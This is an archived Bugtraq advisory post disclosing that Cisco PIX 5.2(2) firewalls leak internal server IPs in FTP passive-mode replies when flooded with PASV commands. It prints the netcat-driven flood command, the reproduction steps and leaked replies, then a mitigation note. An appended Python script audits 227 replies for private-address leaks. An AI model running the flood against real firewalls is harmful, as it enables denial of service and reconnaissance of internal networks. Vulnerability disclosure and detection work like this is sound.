Bugtraq mailing list archives
Cisco PIX Firewall allow external users to discover internal IPs
From: "Fabio Pietrosanti (naif)" <naif () INET IT>
Date: Tue, 3 Oct 2000 12:24:09 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

The vulnerability in the Subject is explained here...

Attached files:
- Script used for the DoS: pasvDOS.sh
- Log of the script: PIXLOG.first_172_16.bz2 & PIXLOG.second_172_16.bz2
- Log of the debug: debug_ftp.txt.bz2

The log of the latest session, against the second PIX whose service network is 192.168.3.0/24, is at:
http://naif.itapac.net/PIXLOG_latest_192_168.bz2
because it's too big to attach to a mailing list.

====
PIX TESTED:

Cisco Secure PIX Firewall Version 5.2(2)
Compiled on Sun 24-Sep-00 18:59 by morlee
skifo-pix up 16 hours 55 mins

Hardware: SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB

0: ethernet0: address is 00d0.b790.5685, irq 11
1: ethernet1: address is 00e0.b601.cfbd, irq 15
2: ethernet2: address is 00e0.b601.cfbc, irq 10
3: ethernet3: address is 00e0.b601.cfbb, irq 9
4: ethernet4: address is 00e0.b601.cfba, irq 11
5: ethernet5: address is 00d0.b790.512e, irq 10

Licensed Features:
Failover:           Enabled
VPN-DES:            Enabled
VPN-3DES:           Disabled
Maximum Interfaces: 6
Cut-through Proxy:  Enabled
Guards:             Enabled
Websense:           Enabled
Throughput:         Unlimited
ISAKMP peers:       Unlimited
====

Cisco released 5.2(4) yesterday, and it's time for a 5.2(5) :(

I've tried to fill the PIX memory with the attached pasvDOS.sh shell script piped through netcat, but I obtained other results... then from the command line:

    <naif@naif> [~] $ (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh | nc eagletmp 21)& ) ; done) >>PIXLOG&

but before starting the "PASV FLOOD" I start logging my ssh session, so we have a log of all the FTP FIXUP DEBUG...

    <naif@naif> [~] $ script debug_ftp.txt

The PIX starts revealing to me the real IP of the server immediately after it kicks me off from ssh with the following error:

    Local: Corrupted check bytes on input.

NOW it starts replying to my PASV command with the REAL internal IP address of the server...

=====
Normal situation:

    227 Entering Passive Mode (xxx,xxx,xxx,xx,18,237)

=====
Under this kind of DoS, after the 21st ftp session that floods the PIX with PASV:

    227 Entering Passive Mode (172,16,1,2,6,113)

After I changed the PIX and network, on another PIX with 5.2(2), I could receive with this DoS:

    227 Entering Passive Mode (192,168,3,2,99,37)

Et voila'...

Trying to reproduce this kind of DoS/exploit, it works only sometimes... after a reload it usually works after this:

- I start
    (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh | nc eagletmp 21)& ) ; done) >>PIXLOG&
- I leave it running for some minutes
- I kill all connections by killing the "nc" processes
- Wait for 2/3 minutes
- Restart with
    (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30; do (sleep 2; (./pasvDOS.sh | nc eagletmp 21)& ) ; done) >>PIXLOG&

but I cannot figure out why.

I notice that using "fixup ftp strict 21" could block this kind of attack, and the error in the debug is:

    get_cmd: ERR: command not terminated

but it's also true that with "fixup ftp strict 21" many ftp clients don't work with ftp servers inside the PIX...

p.s. everybody now knows that "mork" has to offer me a lunch ;)

Pietrosanti Fabio (naif)
E-mail: naif () inet it
PGP Key (DSS) http://naif.itapac.net/naif.asc
--
Free advertising: www.openbsd.org - Multiplatform Ultra-secure OS

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
Filter: gpg4pine 4.1 (http://azzie.robotics.net)

iD8DBQE52bPQdK5I1NnlcMYRAjN7AKDTZSntnK6lmtFqq3r9WtWR6TJnIgCfQ8LN
MhtFpAc2KZMcrcOf82OAaJk=
=uso7
-----END PGP SIGNATURE-----
Attachments: pasvDOS.sh, PIXLOG.first_172_16.bz2, PIXLOG.second_172_16.bz2, debug_ftp.txt.bz2
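The post's evidence is the address carried in the FTP 227 reply: normally the PIX rewrites it to the translated outside address, and under the PASV flood the reply starts carrying the server's RFC 1918 address instead. The following is an added example, written for this archive page and not part of the original post or its attached pasvDOS.sh: it parses 227 replies and classifies each against the address the control connection was made to, which is the check a practitioner would run on a capture of the outside interface to see whether the fixup is still rewriting PASV replies. It also includes a small CRLF-termination check that mirrors what the "command not terminated" debug message suggests strict mode objects to; that reading of strict mode is an assumption drawn from the debug line, not from Cisco documentation. The sample replies are constructed: 203.0.113.10 (a TEST-NET-3 documentation address) stands in for the PIX's translated outside address, the two private addresses are the ones the post reports leaking, and the verdict names (ok, rfc1918, mismatch, invalid) are this example's own.

```python
import ipaddress
import re

# RFC 959 passive-mode reply, e.g. "227 Entering Passive Mode (172,16,1,2,6,113)".
PASV_RE = re.compile(
    r"^227\b.*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)

# The address ranges whose appearance in a 227 reply on the outside of the
# firewall is a leak of internal addressing (RFC 1918).
RFC1918 = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def parse_pasv(reply):
    """Return (ip, port) from a 227 reply, or None if it is not a well-formed 227."""
    m = PASV_RE.match(reply.strip())
    if not m:
        return None
    octets = [int(x) for x in m.groups()]
    if any(o > 255 for o in octets):
        return None
    h1, h2, h3, h4, p1, p2 = octets
    return (f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2)


def classify_pasv(reply, control_peer):
    """Classify a 227 reply captured on the outside of a NAT/firewall.

    control_peer is the address the client connected to on port 21, i.e. the
    translated outside address of the FTP server. Verdicts:
      'invalid'  - not a well-formed 227 reply
      'ok'       - data address equals the control peer (fixup rewrote it)
      'rfc1918'  - data address is private: the internal address leaked
      'mismatch' - non-private address that is not the control peer
    """
    parsed = parse_pasv(reply)
    if parsed is None:
        return "invalid"
    ip = ipaddress.ip_address(parsed[0])
    if ip == ipaddress.ip_address(control_peer):
        return "ok"
    if any(ip in net for net in RFC1918):
        return "rfc1918"
    return "mismatch"


def audit_pasv_replies(replies, control_peer):
    """Classify every reply; returns a list of (reply, verdict) pairs."""
    return [(r, classify_pasv(r, control_peer)) for r in replies]


def unterminated_commands(raw):
    """Return the fragments of a raw FTP command stream that are not CRLF-terminated.

    Assumption for this example: a strict command parser accepts only
    CRLF-terminated commands, so a bare LF or a trailing partial command is
    what would be refused as 'command not terminated'.
    """
    return [chunk for chunk in raw.splitlines(keepends=True)
            if not chunk.endswith(b"\r\n")]


# Constructed sample data (not from the post's logs).
SAMPLE_PEER = "203.0.113.10"
SAMPLE_REPLIES = [
    "227 Entering Passive Mode (203,0,113,10,18,237)",  # rewritten to the outside address
    "227 Entering Passive Mode (172,16,1,2,6,113)",     # internal address leaked
    "227 Entering Passive Mode (192,168,3,2,99,37)",    # internal address leaked
    "227 Entering Passive Mode (198,51,100,7,4,1)",     # not private, not the peer
    "500 Syntax error, command unrecognized.",          # not a 227 at all
]

if __name__ == "__main__":
    for reply, verdict in audit_pasv_replies(SAMPLE_REPLIES, SAMPLE_PEER):
        print(f"{verdict:8s} {reply}")
    for frag in unterminated_commands(b"PASV\r\nPASV\nPASV"):
        print("unterminated:", frag)
```

Run it against a capture by feeding every line that begins with 227 on the server-to-client side of port 21 to audit_pasv_replies together with the server's outside address; any 'rfc1918' verdict is the leak the post describes, and a 'mismatch' is worth a look because the reply points the client's data connection at a third host.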
Current thread:
- Cisco PIX Firewall allow external users to discover internal IPs Fabio Pietrosanti (naif) (Oct 03)
- Re: Cisco PIX Firewall allow external users to discover internal IPs Dug Song (Oct 04)